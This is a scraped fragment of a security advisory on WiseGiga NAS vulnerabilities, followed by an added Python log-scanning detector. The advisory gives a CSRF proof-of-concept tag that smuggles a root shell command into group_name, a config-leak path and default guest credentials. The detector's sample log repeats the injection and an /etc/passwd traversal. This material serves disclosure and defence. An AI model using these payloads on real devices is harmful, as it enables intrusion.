!important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> uid=0(root) gid=48(apache) groups=48(apache)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980593801537199-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980593801537199-1\"><span class=\"crayon-v\">uid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">root<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">gid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">groups<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">apache<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><strong>Remote Command Execution as root with CSRF<\/strong><br \/> There is no CSRF protection in WiseGiga NAS.<\/p>\n<p>An attacker can therefore force a command to execute as root when the victim visits a malicious website. Because the request above needs no session (the <em>memberid=root<\/em> parameter bypasses authentication), this vector mainly serves to reach a NAS that is only exposed on the victim&#8217;s internal network.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Once the victim visits the attacker&#8217;s website containing the following code, the attacker can execute arbitrary commands on the NAS.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59af22d980595996454211\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;img src=&#8221;http:\/\/192.168.1.1\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;COMMANDTOEXECUTE&#8221;&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59af22d980595996454211-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59af22d980595996454211-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">img <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/192.168.1.1\/admin\/group.php?memberid=root&amp;cmd=add&amp;group_name=d;COMMANDTOEXECUTE&#8221;<\/span><span 
class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p><strong>InfoLeak<\/strong><br \/> accessing <em>http:\/\/IP\/webfolder\/config\/config.php<\/em>  will disclose the PHP configuration.<\/p>\n<p><strong>Default accounts<\/strong><br \/> Username: guest<br \/> Password: guest09#$<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3402\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 05 Sep 2017 11:11:02 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes five (5) vulnerabilities and default accounts \/ passwords found in WiseGiga NAS devices. WiseGiga is a Korean company selling NAS products. 
The vulnerabilities found in WiseGiga NAS are: Pre-Authentication Local File Inclusion (4 different vulnerabilities) Post-Authentication Local File Inclusion Remote Command Execution as root Remote Command Execution as root &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3402\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 WiseGiga NAS Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12135,14428,11851,10757,12136],"class_list":["post-9094","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-information-disclosure","tag-local-file-inclusion","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9094","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9094"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9094\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9094"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9094"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.
palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9094"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
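As an added example (not code from the SSD advisory, from Beyond Security or from WiseGiga), the following Python script turns the indicators quoted in the advisory into detection logic a defender could run over the NAS's Apache access log: it flags memberid= supplied in a query string (the global that pre.php trusts), shell metacharacters in group_name on /admin/group.php?cmd=add, path traversal in filename= on the four pre-auth LFI endpoints, and fetches of /webfolder/config/config.php. It assumes Apache combined log format (the advisory only says the NAS runs Apache as root); the log lines embedded in SAMPLE_LOG are constructed for this example, and the allow-list in is_valid_group_name() is this editor's suggestion for the check a fix would need before calling root_exec_cmd(), not anything the vendor ships.

```python
"""Detection logic for the WiseGiga NAS issues described in this advisory.

Added example: not code from the advisory or from WiseGiga. Assumes Apache
combined-format access logs; SAMPLE_LOG below is constructed for this example.
"""
import re
from urllib.parse import urlsplit, unquote_plus

# Endpoints the advisory lists as vulnerable to pre-auth LFI via filename=.
LFI_PATHS = {
    "/webfolder/download_file1.php",
    "/down_data.php",
    "/download_file.php",
    "/mobile/download_file1.php",
}

# Any of these inside "addgroup $group_name" gives the attacker a second
# command or a redirect, because root_exec_cmd() hands the string to a shell.
SHELL_META = re.compile(r"[;&|`$<>\n]")

# Allow-list a fix would apply to group_name before it reaches root_exec_cmd()
# (editor's suggestion, not vendor code).
GROUP_NAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")

# Apache combined log format: client, ident, user, [timestamp], "request", status.
APACHE_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_query(query):
    """Split a query string the way PHP does: on '&' only, never on ';'.

    Older urllib versions also split on ';', which would hide the injected
    'd;id ...' payload behind a bogus second parameter, so split by hand.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def is_valid_group_name(name):
    """True if name contains only characters a Unix group name needs."""
    return GROUP_NAME.fullmatch(name) is not None


def classify_request(target):
    """Return the advisory-related findings for one request target."""
    url = urlsplit(target)
    q = parse_query(url.query)
    findings = []
    if "memberid" in q:
        # pre.php reads $memberid as a global, so a query parameter can
        # choose which user the request is treated as.
        findings.append("memberid supplied in query string (auth-bypass indicator)")
    if url.path == "/admin/group.php" and q.get("cmd") == "add":
        group = q.get("group_name", "")
        if SHELL_META.search(group):
            findings.append("group.php command injection: " + group)
    if url.path in LFI_PATHS and "filename" in q:
        name = q["filename"]
        if ".." in name or name.startswith("/"):
            findings.append("pre-auth LFI via filename=" + name)
    if url.path == "/webfolder/config/config.php":
        findings.append("config.php info leak probe")
    return findings


def scan_log(text):
    """Return (client ip, request target, findings) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = APACHE_LINE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


# Constructed sample: the advisory's PoC request, an LFI probe, a config.php
# fetch, a group add that carries memberid but no injection, and benign noise.
SAMPLE_LOG = """\
10.0.0.7 - - [05/Sep/2017:11:11:02 +0000] "GET /admin/group.php?memberid=root&cmd=add&group_name=d;id%20%3E%20/tmp/a HTTP/1.0" 200 512
10.0.0.7 - - [05/Sep/2017:11:11:05 +0000] "GET /webfolder/download_file1.php?filename=../../../../etc/passwd HTTP/1.1" 200 1337
10.0.0.9 - - [05/Sep/2017:11:12:00 +0000] "GET /webfolder/config/config.php HTTP/1.1" 200 2048
10.0.0.12 - - [05/Sep/2017:11:13:00 +0000] "GET /admin/group.php?memberid=root&cmd=add&group_name=staff HTTP/1.1" 200 512
10.0.0.15 - - [05/Sep/2017:11:14:00 +0000] "GET /index.php HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target)
        for finding in findings:
            print("    " + finding)
```

The query string is deliberately split on & only, as PHP does; a parser that also splits on ; would turn the d;id payload into a harmless-looking second parameter and miss the injection. On the fixing side, the allow-list above plus escapeshellarg() before root_exec_cmd() closes the injection, but the advisory's uid=0 output shows the deeper problem: as long as Apache runs as root, any remaining injection in any PHP page is a root compromise.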